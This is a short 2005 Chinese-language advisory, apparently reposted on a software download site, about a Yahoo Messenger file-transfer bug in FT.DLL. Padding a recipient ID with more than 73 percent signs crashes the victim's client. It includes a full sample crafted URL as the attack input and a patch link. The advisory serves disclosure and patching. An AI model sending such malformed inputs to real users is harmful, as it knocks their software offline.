Yahoo messenger缓冲溢出漏洞!
添加时间: 2005-5-21 3:36:02 作者: 网络技术 阅读次数:129 来源: http://d9soft.com
受影响程序:Yahoo messenger
详细描述:yahoo messenger中的文件传输选项漏洞能让远程攻击者关闭受害人的yahoo messenger客户端。
yahoo messenger能过滤掉yahooID中的一些特别字符(象&,?),当攻击者发送一个文件到 “受害人的ID%%%%%%%%%(超过73个字符)”时,服务器端过滤掉%字符署名“受害者ID”并打开一个文件传输会话,如果受害人接受了这个文件,他的客户端就会提示存取出错并关闭,出错的原因是负责yahoo messenger P2P文件传输中的一个FT.DLL文件造成的。
攻击者发送给受害者机器的样本地址:
http://10.10.10.1:81/Messenger.victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25.1066206307331File.txt?AppID=Messenger&UserID=victimid%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25%25&K=lc9ly5954h9doeawsg31h9tgta6c7dtod8bqxrt2vykgw5e5j9dao0o9doeawsg31h9t8vey6uq19
6y 14 53
Messenger.vicitimid%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%.1066377306549File.TXT
补丁下载:http://cn.messenger.yahoo.com/
上下文章:
上一篇文章: 病毒预警一周播报! 下一篇文章: 11月5日热门病毒!
相关文章:
相关软件: